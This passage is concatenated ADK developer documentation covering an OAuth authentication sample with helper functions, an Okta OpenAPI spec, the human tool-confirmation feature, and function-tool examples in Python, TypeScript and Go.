# This typically includes the provider's authorization endpoint URL, # client ID, requested scopes, response type (e.g., 'code'), and the redirect URI. # Here, we retrieve the base authorization URI from the AuthConfig provided by ADK # and append the redirect_uri. # NOTE: A robust implementation would use urlencode and potentially add state, scope, etc. auth_request_uri = ( auth_config.exchanged_auth_credential.oauth2.auth_uri + f'&redirect_uri={redirect_uri}' # Simple concatenation; ensure correct query param format ) print("\n--- User Action Required ---") # Prompt the user to visit the authorization URL, log in, grant permissions, # and then paste the *full* URL they are redirected back to (which contains the auth code). auth_response_uri = await get_user_input( f'1. Please open this URL in your browser to log in:\n {auth_request_uri}\n\n' f'2. After successful login and authorization, your browser will be redirected.\n' f' Copy the *entire* URL from the browser\'s address bar.\n\n' f'3. Paste the copied URL here and press Enter:\n\n> ' ) # --- Step 5: Prepare Authentication Response for the Agent --- # Update the AuthConfig object with the information gathered from the user. # The ADK framework needs the full response URI (containing the code) # and the original redirect URI to complete the OAuth token exchange process internally. auth_config.exchanged_auth_credential.oauth2.auth_response_uri = auth_response_uri auth_config.exchanged_auth_credential.oauth2.redirect_uri = redirect_uri # Construct a FunctionResponse Content object to send back to the agent/runner. # This response explicitly targets the 'adk_request_credential' function call # identified earlier by its ID. auth_content = types.Content( role='user', parts=[ types.Part( function_response=types.FunctionResponse( # Crucially, link this response to the original request using the saved ID. id=auth_request_event_id, # The special name of the function call we are responding to. 
name='adk_request_credential', # The payload containing all necessary authentication details. response=auth_config.model_dump(), ) ) ], ) # --- Step 6: Resume Execution with Authentication --- print("\nSubmitting authentication details back to the agent...") # Run the agent again, this time providing the `auth_content` (FunctionResponse). # The ADK Runner intercepts this, processes the 'adk_request_credential' response # (performs token exchange, stores credentials), and then allows the agent # to retry the original tool call that required authentication, now succeeding with # a valid access token embedded. events_async = runner.run_async( session_id=session.id, user_id='user', new_message=auth_content, # Provide the prepared auth response ) # Process and print the final events from the agent after authentication is complete. # This stream now contains the actual result from the tool (e.g., the user info). print("\n--- Agent Response after Authentication ---") async for event in events_async: print(event) if __name__ == '__main__': asyncio.run(async_main()) ``` helpers.py ```py from google.adk.auth import AuthConfig from google.adk.events import Event import asyncio # --- Helper Functions --- async def get_user_input(prompt: str) -> str: """ Asynchronously prompts the user for input in the console. Uses asyncio's event loop and run_in_executor to avoid blocking the main asynchronous execution thread while waiting for synchronous `input()`. Args: prompt: The message to display to the user. Returns: The string entered by the user. """ loop = asyncio.get_running_loop() # Run the blocking `input()` function in a separate thread managed by the executor. return await loop.run_in_executor(None, input, prompt) def is_pending_auth_event(event: Event) -> bool: """ Checks if an ADK Event represents a request for user authentication credentials.
The ADK framework emits a specific function call ('adk_request_credential') when a tool requires authentication that hasn't been previously satisfied. Args: event: The ADK Event object to inspect. Returns: True if the event is an 'adk_request_credential' function call, False otherwise. """ # Safely checks nested attributes to avoid errors if event structure is incomplete. return bool( event.content and event.content.parts and event.content.parts[0] # Assuming the function call is in the first part and event.content.parts[0].function_call # The specific function name indicating an auth request from the ADK framework. and event.content.parts[0].function_call.name == 'adk_request_credential' ) def get_function_call_id(event: Event) -> str: """ Extracts the unique ID of the function call from an ADK Event. This ID is crucial for correlating a function *response* back to the specific function *call* that the agent initiated to request auth credentials. Args: event: The ADK Event object containing the function call. Returns: The unique identifier string of the function call. Raises: ValueError: If the function call ID cannot be found in the event structure. """ # Navigate through the event structure to find the function call ID. if ( event and event.content and event.content.parts and event.content.parts[0] and event.content.parts[0].function_call and event.content.parts[0].function_call.id ): return event.content.parts[0].function_call.id # If the ID is missing, raise an error indicating an unexpected event format. raise ValueError(f'Cannot get function call id from event {event}') def get_function_call_auth_config(event: Event) -> AuthConfig: """ Extracts the authentication configuration details from an 'adk_request_credential' event.
The client should use this AuthConfig to fill in the necessary authentication details (like OAuth codes and state) and send it back to the ADK to continue the OAuth token exchange. Args: event: The ADK Event object containing the 'adk_request_credential' call. Returns: An AuthConfig object populated with details from the function call arguments. Raises: ValueError: If the 'auth_config' argument cannot be found in the event. """ if ( event and event.content and event.content.parts and event.content.parts[0] and event.content.parts[0].function_call and event.content.parts[0].function_call.args and event.content.parts[0].function_call.args.get('auth_config') ): # Reconstruct the AuthConfig object using the dictionary provided in the arguments. # The ** operator unpacks the dictionary into keyword arguments for the constructor. return AuthConfig( **event.content.parts[0].function_call.args.get('auth_config') ) raise ValueError(f'Cannot get auth config from event {event}') ``` ```yaml openapi: 3.0.1 info: title: Okta User Info API version: 1.0.0 description: |- API to retrieve user profile information based on a valid Okta OIDC Access Token. Authentication is handled via OpenID Connect with Okta. contact: name: API Support email: support@example.com # Replace with actual contact if available servers: - url: description: Production Environment paths: /okta-jwt-user-api: get: summary: Get Authenticated User Info description: |- Fetches profile details for the user operationId: getUserInfo tags: - User Profile security: - okta_oidc: - openid - email - profile responses: '200': description: Successfully retrieved user information. content: application/json: schema: type: object properties: sub: type: string description: Subject identifier for the user. example: "abcdefg" name: type: string description: Full name of the user.
example: "Example LastName" locale: type: string description: User's locale, e.g., en-US or en_US. example: "en_US" email: type: string format: email description: User's primary email address. example: "username@example.com" preferred_username: type: string description: Preferred username of the user (often the email). example: "username@example.com" given_name: type: string description: Given name (first name) of the user. example: "Example" family_name: type: string description: Family name (last name) of the user. example: "LastName" zoneinfo: type: string description: User's timezone, e.g., America/Los_Angeles. example: "America/Los_Angeles" updated_at: type: integer format: int64 # Using int64 for Unix timestamp description: Timestamp when the user's profile was last updated (Unix epoch time). example: 1743617719 email_verified: type: boolean description: Indicates if the user's email address has been verified. example: true required: - sub - name - locale - email - preferred_username - given_name - family_name - zoneinfo - updated_at - email_verified '401': description: Unauthorized. The provided Bearer token is missing, invalid, or expired. content: application/json: schema: $ref: '#/components/schemas/Error' '403': description: Forbidden. The provided token does not have the required scopes or permissions to access this resource. content: application/json: schema: $ref: '#/components/schemas/Error' components: securitySchemes: okta_oidc: type: openIdConnect description: Authentication via Okta using OpenID Connect. Requires a Bearer Access Token. openIdConnectUrl: https://your-endpoint.okta.com/.well-known/openid-configuration schemas: Error: type: object properties: code: type: string description: An error code. message: type: string description: A human-readable error message. 
required: - code - message ``` # Get action confirmation for ADK Tools Supported in ADK: Python v1.14.0 (Experimental) Some agent workflows require confirmation for decision making, verification, security, or general oversight. In these cases, you want to get a response from a human or supervising system before proceeding with a workflow. The *Tool Confirmation* feature in the Agent Development Kit (ADK) allows an ADK Tool to pause its execution and interact with a user or other system for confirmation or to gather structured data before proceeding. You can use Tool Confirmation with an ADK Tool in the following ways: - **[Boolean Confirmation](#boolean-confirmation):** You can configure a `FunctionTool` with a `require_confirmation` parameter. This option pauses the tool for a yes or no confirmation response. - **[Advanced Confirmation](#advanced-confirmation):** For scenarios requiring structured data responses, you can configure a `FunctionTool` with a text prompt to explain the confirmation and an expected response. Experimental: The Tool Confirmation feature is experimental and has some [known limitations](#known-limitations). We welcome your [feedback](https://github.com/google/adk-python/issues/new?template=feature_request.md&labels=tool%20confirmation)! You can configure how a request is communicated to a user, and the system can also use [remote responses](#remote-response) sent via the ADK server's REST API. When using the confirmation feature with the ADK web user interface, the agent workflow displays a dialog box to the user to request input, as shown in Figure 1: **Figure 1.** Example confirmation response request dialog box using an advanced tool response implementation. The following sections describe how to use this feature for the confirmation scenarios.
For a complete code sample, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) example. There are additional ways to incorporate human input into your agent workflow. For more details, see the [Human-in-the-loop](/adk-docs/agents/multi-agents/#human-in-the-loop-pattern) agent pattern. ## Boolean confirmation When your tool only requires a simple `yes` or `no` from the user, you can append a confirmation step using the `FunctionTool` class as a wrapper. For example, if you have a tool called `reimburse`, you can enable a confirmation step by wrapping it with the `FunctionTool` class and setting the `require_confirmation` parameter to `True`, as shown in the following example: ```text # From agent.py root_agent = Agent( ... tools=[ # Set require_confirmation to True to require user confirmation # for the tool call. FunctionTool(reimburse, require_confirmation=True), ], ... ) ``` This implementation method requires minimal code, but is limited to simple approvals from the user or confirming system. For a complete example of this approach, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. ### Require confirmation function You can modify the behavior of the `require_confirmation` parameter by replacing its input value with a function that returns a boolean. The following example shows a function for determining if a confirmation is required: ```text async def confirmation_threshold( amount: int, tool_context: ToolContext ) -> bool: """Returns true if the amount is greater than 1000.""" return amount > 1000 ``` This function can then be set as the value of the `require_confirmation` parameter: ```text root_agent = Agent( ...
tools=[ # Pass a function to require_confirmation so that confirmation is # only requested when the function returns True. FunctionTool(reimburse, require_confirmation=confirmation_threshold), ], ... ) ``` For a complete example of this implementation, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. ## Advanced confirmation When a tool confirmation requires more details for the user or a more complex response, use a `tool_confirmation` implementation. This approach extends the `ToolContext` object to add a text description of the request for the user and allows for more complex response data. When implementing tool confirmation this way, you can pause a tool's execution, request specific information, and then resume the tool with the provided data. This confirmation flow has a request stage, where the system assembles and sends an input request for a human response, and a response stage, where the system receives and processes the returned data. ### Confirmation definition When creating a Tool with an advanced confirmation, create a function that includes a `ToolContext` parameter. Then request the confirmation by calling the `tool_context.request_confirmation()` method with `hint` and `payload` parameters, and read the result from the `tool_context.tool_confirmation` object. These parameters are used as follows: - `hint`: Descriptive message that explains what is needed from the user. - `payload`: The structure of the data you expect in return. This data type is `Any` and must be serializable into a JSON-formatted string, such as a dictionary or pydantic model. The following code shows an example implementation for a tool that processes time off requests for an employee: ```text def request_time_off(days: int, tool_context: ToolContext): """Request day off for the employee.""" ...
tool_confirmation = tool_context.tool_confirmation if not tool_confirmation: tool_context.request_confirmation( hint=( 'Please approve or reject the tool call request_time_off() by' ' responding with a FunctionResponse with an expected' ' ToolConfirmation payload.' ), payload={ 'approved_days': 0, }, ) # Return intermediate status indicating that the tool is waiting for # a confirmation response: return {'status': 'Manager approval is required.'} approved_days = tool_confirmation.payload['approved_days'] approved_days = min(approved_days, days) if approved_days == 0: return {'status': 'The time off request is rejected.', 'approved_days': 0} return { 'status': 'ok', 'approved_days': approved_days, } ``` For a complete example of this approach, see the [human_tool_confirmation](https://github.com/google/adk-python/blob/fc90ce968f114f84b14829f8117797a4c256d710/contributing/samples/human_tool_confirmation/agent.py) code sample. Keep in mind that the agent workflow tool execution pauses while a confirmation is obtained. After confirmation is received, you can access the confirmation response in the `tool_confirmation.payload` object and then proceed with the execution of the workflow. ## Remote confirmation with REST API If there is no active user interface for a human confirmation of an agent workflow, you can handle the confirmation through a command-line interface or by routing it through another channel like email or a chat application. To confirm the tool call, the user or calling application needs to send a `FunctionResponse` event with the tool confirmation data. You can send the request to the ADK API server's `/run` or `/run_sse` endpoint, or directly to the ADK runner. 
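As a rough illustration of what a calling application has to assemble, the following Python sketch builds the JSON body for such a `FunctionResponse` message using only the standard library. The helper name `build_confirmation_body` and the ID values are hypothetical placeholders, and placing extra data under a `payload` key inside `response` is an assumption rather than something this page specifies. The remaining field names follow the request format described in this section.

```python
import json
from typing import Any, Optional


def build_confirmation_body(
    app_name: str,
    user_id: str,
    session_id: str,
    function_call_id: str,
    confirmed: bool,
    payload: Optional[dict] = None,
) -> dict:
    """Build the request body for a tool confirmation response (hypothetical helper)."""
    response: dict[str, Any] = {"confirmed": confirmed}
    if payload is not None:
        # Assumption: additional data for advanced confirmations is sent
        # under a "payload" key next to the confirmation status.
        response["payload"] = payload
    return {
        "app_name": app_name,
        "user_id": user_id,
        "session_id": session_id,
        "new_message": {
            "role": "user",
            "parts": [
                {
                    "function_response": {
                        # Must match the function call ID of the
                        # confirmation request being answered.
                        "id": function_call_id,
                        "name": "adk_request_confirmation",
                        "response": response,
                    }
                }
            ],
        },
    }


# Placeholder identifiers; use the values from your own session and event.
body = build_confirmation_body(
    app_name="human_tool_confirmation",
    user_id="user",
    session_id="example-session-id",
    function_call_id="example-function-call-id",
    confirmed=True,
    payload={"approved_days": 2},
)
print(json.dumps(body, indent=2))
```

The resulting dictionary can be serialized and posted to the `/run` or `/run_sse` endpoint with any HTTP client.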
The following example uses a `curl` command to send the confirmation to the `/run_sse` endpoint: ```text curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "human_tool_confirmation", "user_id": "user", "session_id": "7828f575-2402-489f-8079-74ea95b6a300", "new_message": { "parts": [ { "function_response": { "id": "adk-13b84a8c-c95c-4d66-b006-d72b30447e35", "name": "adk_request_confirmation", "response": { "confirmed": true } } } ], "role": "user" } }' ``` A REST-based response for a confirmation must meet the following requirements: - The `id` in the `function_response` should match the `function_call_id` from the `RequestConfirmation` `FunctionCall` event. - The `name` should be `adk_request_confirmation`. - The `response` object contains the confirmation status and any additional payload data required by the tool. Note: Confirmation with Resume feature If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you also must include the Invocation ID (`invocation_id`) parameter with the confirmation response. The Invocation ID you provide must be the same invocation that generated the confirmation request, otherwise the system starts a new invocation with the confirmation response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your confirmation request, so it can be included with the response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/). ## Known limitations The tool confirmation feature has the following limitations: - [DatabaseSessionService](/adk-docs/api-reference/python/google-adk.html#google.adk.sessions.DatabaseSessionService) is not supported by this feature. - [VertexAiSessionService](/adk-docs/api-reference/python/google-adk.html#google.adk.sessions.VertexAiSessionService) is not supported by this feature. 
## Next steps For more information on building ADK tools for agent workflows, see [Function tools](/adk-docs/tools-custom/function-tools/). # Function tools Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0 When pre-built ADK tools don't meet your requirements, you can create custom *function tools*. Building function tools allows you to create tailored functionality, such as connecting to proprietary databases or implementing unique algorithms. For example, a function tool, `myfinancetool`, might be a function that calculates a specific financial metric. ADK also supports long-running functions, so if that calculation takes a while, the agent can continue working on other tasks. ADK offers several ways to create function tools, each suited to different levels of complexity and control: - [Function Tools](#function-tool) - [Long Running Function Tools](#long-run-tool) - [Agents-as-a-Tool](#agent-tool) ## Function Tools Transforming a Python function into a tool is a straightforward way to integrate custom logic into your agents. When you assign a function to an agent’s `tools` list, the framework automatically wraps it as a `FunctionTool`. ### How it Works The ADK framework automatically inspects your Python function's signature (including its name, docstring, parameters, type hints, and default values) to generate a schema. This schema is what the LLM uses to understand the tool's purpose, when to use it, and what arguments it requires. ### Defining Function Signatures A well-defined function signature is crucial for the LLM to use your tool correctly. #### Parameters ##### Required Parameters A parameter is considered **required** if it has a type hint but **no default value**. The LLM must provide a value for this argument when it calls the tool. The parameter's description is taken from the function's docstring.
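To make the inspection step more concrete, here is a minimal sketch that uses Python's standard `inspect` module to derive a schema-like dictionary from a function signature. It is only an illustration of the idea, not ADK's actual implementation: the helper `sketch_tool_schema`, the output layout, and the sample function `lookup_order` are all hypothetical.

```python
import inspect
from typing import Any, Callable


def sketch_tool_schema(func: Callable[..., Any]) -> dict:
    """Derive a simplified, schema-like dict from a function (illustrative only)."""
    parameters: dict[str, str] = {}
    required: list[str] = []
    for name, param in inspect.signature(func).parameters.items():
        # Skip *args and **kwargs, which cannot be described as named arguments.
        if param.kind in (
            inspect.Parameter.VAR_POSITIONAL,
            inspect.Parameter.VAR_KEYWORD,
        ):
            continue
        annotation = param.annotation
        parameters[name] = getattr(annotation, "__name__", str(annotation))
        # A parameter without a default value is treated as required.
        if param.default is inspect.Parameter.empty:
            required.append(name)
    return {
        "name": func.__name__,
        "description": inspect.getdoc(func) or "",
        "parameters": parameters,
        "required": required,
    }


def lookup_order(order_id: str, include_history: bool = False):
    """Looks up an order by its ID."""
    return {"status": "success", "order_id": order_id}


schema = sketch_tool_schema(lookup_order)
print(schema)
```

In this sketch, `order_id` ends up in the `required` list because it has no default value, while `include_history` does not.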
Example: Required Parameters ```python def get_weather(city: str, unit: str): """ Retrieves the weather for a city in the specified unit. Args: city (str): The city name. unit (str): The temperature unit, either 'Celsius' or 'Fahrenheit'. """ # ... function logic ... return {"status": "success", "report": f"Weather for {city} is sunny."} ``` In this example, both `city` and `unit` are mandatory. If the LLM tries to call `get_weather` without one of them, the ADK will return an error to the LLM, prompting it to correct the call. In Go, you use struct tags to control the JSON schema. The two primary tags are `json` and `jsonschema`. A parameter is considered **required** if its struct field does **not** have the `omitempty` or `omitzero` option in its `json` tag. The `jsonschema` tag is used to provide the argument's description. This is crucial for the LLM to understand what the argument is for. Example: Required Parameters ```go // GetWeatherParams defines the arguments for the getWeather tool. type GetWeatherParams struct { // This field is REQUIRED (no "omitempty"). // The jsonschema tag provides the description. Location string `json:"location" jsonschema:"The city and state, e.g., San Francisco, CA"` // This field is also REQUIRED. Unit string `json:"unit" jsonschema:"The temperature unit, either 'celsius' or 'fahrenheit'"` } ``` In this example, both `location` and `unit` are mandatory. ##### Optional Parameters A parameter is considered **optional** if you provide a **default value**. This is the standard Python way to define optional arguments. You can also mark a parameter as optional using `typing.Optional[SomeType]` or the `| None` syntax (Python 3.10+). Example: Optional Parameters ```python def search_flights(destination: str, departure_date: str, flexible_days: int = 0): """ Searches for flights. Args: destination (str): The destination city. departure_date (str): The desired departure date. 
flexible_days (int, optional): Number of flexible days for the search. Defaults to 0. """ # ... function logic ... if flexible_days > 0: return {"status": "success", "report": f"Found flexible flights to {destination}."} return {"status": "success", "report": f"Found flights to {destination} on {departure_date}."} ``` Here, `flexible_days` is optional. The LLM can choose to provide it, but it's not required. A parameter is considered **optional** if its struct field has the `omitempty` or `omitzero` option in its `json` tag. Example: Optional Parameters ```go // GetWeatherParams defines the arguments for the getWeather tool. type GetWeatherParams struct { // Location is required. Location string `json:"location" jsonschema:"The city and state, e.g., San Francisco, CA"` // Unit is optional. Unit string `json:"unit,omitempty" jsonschema:"The temperature unit, either 'celsius' or 'fahrenheit'"` // Days is optional. Days int `json:"days,omitzero" jsonschema:"The number of forecast days to return (defaults to 1)"` } ``` Here, `unit` and `days` are optional. The LLM can choose to provide them, but they are not required. ##### Optional Parameters with `typing.Optional` You can also mark a parameter as optional using `typing.Optional[SomeType]` or the `| None` syntax (Python 3.10+). This signals that the parameter can be `None`. When combined with a default value of `None`, it behaves as a standard optional parameter. Example: `typing.Optional` ```python from typing import Optional def create_user_profile(username: str, bio: Optional[str] = None): """ Creates a new user profile. Args: username (str): The user's unique username. bio (str, optional): A short biography for the user. Defaults to None. """ # ... function logic ... 
if bio: return {"status": "success", "message": f"Profile for {username} created with a bio."} return {"status": "success", "message": f"Profile for {username} created."} ``` ##### Variadic Parameters (`*args` and `**kwargs`) While you can include `*args` (variable positional arguments) and `**kwargs` (variable keyword arguments) in your function signature for other purposes, they are **ignored by the ADK framework** when generating the tool schema for the LLM. The LLM will not be aware of them and cannot pass arguments to them. It's best to rely on explicitly defined parameters for all data you expect from the LLM. #### Return Type The preferred return type for a Function Tool is a **dictionary** in Python, a **Map** in Java, or an **object** in TypeScript. This allows you to structure the response with key-value pairs, providing context and clarity to the LLM. If your function returns a type other than a dictionary, the framework automatically wraps it into a dictionary with a single key named **"result"**. Strive to make your return values as descriptive as possible. *For example,* instead of returning a numeric error code, return a dictionary with an "error_message" key containing a human-readable explanation. **Remember that the LLM**, not a piece of code, needs to understand the result. As a best practice, include a "status" key in your return dictionary to indicate the overall outcome (e.g., "success", "error", "pending"), providing the LLM with a clear signal about the operation's state. #### Docstrings The docstring of your function serves as the tool's **description** and is sent to the LLM. Therefore, a well-written and comprehensive docstring is crucial for the LLM to understand how to use the tool effectively. Clearly explain the purpose of the function, the meaning of its parameters, and the expected return values. ### Passing Data Between Tools When an agent calls multiple tools in a sequence, you might need to pass data from one tool to another. 
The recommended way to do this is by using the `temp:` prefix in the session state. A tool can write data to a `temp:` variable, and a subsequent tool can read it. This data is only available for the current invocation and is discarded afterwards. Shared Invocation Context: All tool calls within a single agent turn share the same `InvocationContext`. This means they also share the same temporary (`temp:`) state, which is how data can be passed between them. ### Example This tool is a Python function that obtains the stock price for a given stock ticker symbol. Note: You need to install the `yfinance` library (`pip install yfinance`) before using this tool. ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types import yfinance as yf APP_NAME = "stock_app" USER_ID = "1234" SESSION_ID = "session1234" def get_stock_price(symbol: str): """ Retrieves the current stock price for a given symbol. Args: symbol (str): The stock symbol (e.g., "AAPL", "GOOG"). Returns: float: The current stock price, or None if an error occurs.
""" try: stock = yf.Ticker(symbol) historical_data = stock.history(period="1d") if not historical_data.empty: current_price = historical_data['Close'].iloc[-1] return current_price else: return None except Exception as e: print(f"Error retrieving stock price for {symbol}: {e}") return None stock_price_agent = Agent( model='gemini-2.0-flash', name='stock_agent', instruction= 'You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price. If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.', description='This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.', tools=[get_stock_price], # You can add Python functions directly to the tools list; they will be automatically wrapped as FunctionTools. ) # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=stock_price_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. 
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("stock price of GOOG") ``` The return value from this tool will be wrapped into a dictionary. ```json {"result": "$123"} ``` This tool retrieves the mocked value of a stock price. ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import {Content, Part, createUserContent} from '@google/genai'; import { stringifyContent, FunctionTool, InMemoryRunner, LlmAgent, } from '@google/adk'; import {z} from 'zod'; // Define the function to get the stock price async function getStockPrice({ticker}: {ticker: string}): Promise<{price: string}> { console.log(`Getting stock price for ${ticker}`); // In a real-world scenario, you would fetch the stock price from an API const price = (Math.random() * 1000).toFixed(2); return {price: `$${price}`}; } async function main() { // Define the schema for the tool's parameters using Zod const getStockPriceSchema = z.object({ ticker: z.string().describe('The stock ticker symbol to look up.'), }); // Create a FunctionTool from the function and schema const stockPriceTool = new FunctionTool({ name: 'getStockPrice', description: 'Gets the current price of a stock.', parameters: getStockPriceSchema, execute: getStockPrice, }); // Define the agent that will use the tool const stockAgent = new LlmAgent({ name: 'stock_agent', model: 'gemini-2.5-flash', instruction: 'You can get the stock price of a
company.', tools: [stockPriceTool], }); // Create a runner for the agent const runner = new InMemoryRunner({agent: stockAgent}); // Create a new session const session = await runner.sessionService.createSession({ appName: runner.appName, userId: 'test-user', }); const userContent: Content = createUserContent('What is the stock price of GOOG?'); // Run the agent and get the response const response = []; for await (const event of runner.runAsync({ userId: session.userId, sessionId: session.id, newMessage: userContent, })) { response.push(event); } // Print the final response from the agent const finalResponse = response[response.length - 1]; if (finalResponse?.content?.parts?.length) { console.log(stringifyContent(finalResponse)); } } main(); ``` The return value from this tool will be an object. ```json For input `GOOG` (example value; the mock price is random): {"price": "$512.34"} ``` This tool retrieves the mocked value of a stock price. ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License.
package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/agenttool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // mockStockPrices provides a simple in-memory database of stock prices // to simulate a real-world stock data API. This allows the example to // demonstrate tool functionality without making external network calls. var mockStockPrices = map[string]float64{ "GOOG": 300.6, "AAPL": 123.4, "MSFT": 234.5, } // getStockPriceArgs defines the schema for the arguments passed to the getStockPrice tool. // Using a struct is the recommended approach in the Go ADK as it provides strong // typing and clear validation for the expected inputs. type getStockPriceArgs struct { Symbol string `json:"symbol" jsonschema:"The stock ticker symbol, e.g., GOOG"` } // getStockPriceResults defines the output schema for the getStockPrice tool. type getStockPriceResults struct { Symbol string `json:"symbol"` Price float64 `json:"price,omitempty"` Error string `json:"error,omitempty"` } // getStockPrice is a tool that retrieves the stock price for a given ticker symbol // from the mockStockPrices map. It demonstrates how a function can be used as a // tool by an agent. If the symbol is found, it returns a struct containing the // symbol and its price. Otherwise, it returns a struct with an error message. 
func getStockPrice(ctx tool.Context, input getStockPriceArgs) (getStockPriceResults, error) { symbolUpper := strings.ToUpper(input.Symbol) if price, ok := mockStockPrices[symbolUpper]; ok { fmt.Printf("Tool: Found price for %s: %f\n", input.Symbol, price) return getStockPriceResults{Symbol: input.Symbol, Price: price}, nil } return getStockPriceResults{}, fmt.Errorf("no data found for symbol") } // createStockAgent initializes and configures an LlmAgent. // This agent is equipped with the getStockPrice tool and is instructed // on how to respond to user queries about stock prices. It uses the // Gemini model to understand user intent and decide when to use its tools. func createStockAgent(ctx context.Context) (agent.Agent, error) { stockPriceTool, err := functiontool.New( functiontool.Config{ Name: "get_stock_price", Description: "Retrieves the current stock price for a given symbol.", }, getStockPrice) if err != nil { return nil, err } model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } return llmagent.New(llmagent.Config{ Name: "stock_agent", Model: model, Instruction: "You are an agent who retrieves stock prices. If a ticker symbol is provided, fetch the current price. If only a company name is given, first perform a Google search to find the correct ticker symbol before retrieving the stock price. If the provided ticker symbol is invalid or data cannot be retrieved, inform the user that the stock price could not be found.", Description: "This agent specializes in retrieving real-time stock prices. Given a stock ticker symbol (e.g., AAPL, GOOG, MSFT) or the stock name, use the tools and reliable data sources to provide the most up-to-date price.", Tools: []tool.Tool{ stockPriceTool, }, }) } // userID and appName are constants used to identify the user and application // throughout the session. 
These values are important for logging, tracking, // and managing state across different agent interactions. const ( userID = "example_user_id" appName = "example_app" ) // callAgent orchestrates the execution of the agent for a given prompt. // It sets up the necessary services, creates a session, and uses a runner // to manage the agent's lifecycle. It streams the agent's responses and // prints them to the console, handling any potential errors during the run. func callAgent(ctx context.Context, a agent.Agent, prompt string) { sessionService := session.InMemoryService() // Create a new session for the agent interactions. session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, }) if err != nil { log.Fatalf("Failed to create the session service: %v", err) } config := runner.Config{ AppName: appName, Agent: a, SessionService: sessionService, } // Create the runner to manage the agent execution. r, err := runner.New(config) if err != nil { log.Fatalf("Failed to create the runner: %v", err) } sessionID := session.Session.ID() userMsg := &genai.Content{ Parts: []*genai.Part{ genai.NewPartFromText(prompt), }, Role: string(genai.RoleUser), } for event, err := range r.Run(ctx, userID, sessionID, userMsg, agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }) { if err != nil { fmt.Printf("\nAGENT_ERROR: %v\n", err) } else { for _, p := range event.Content.Parts { fmt.Print(p.Text) } } } } // RunAgentSimulation serves as the entry point for this example. // It creates the stock agent and then simulates a series of user interactions // by sending different prompts to the agent. This function showcases how the // agent responds to various queries, including both successful and unsuccessful // attempts to retrieve stock prices. 
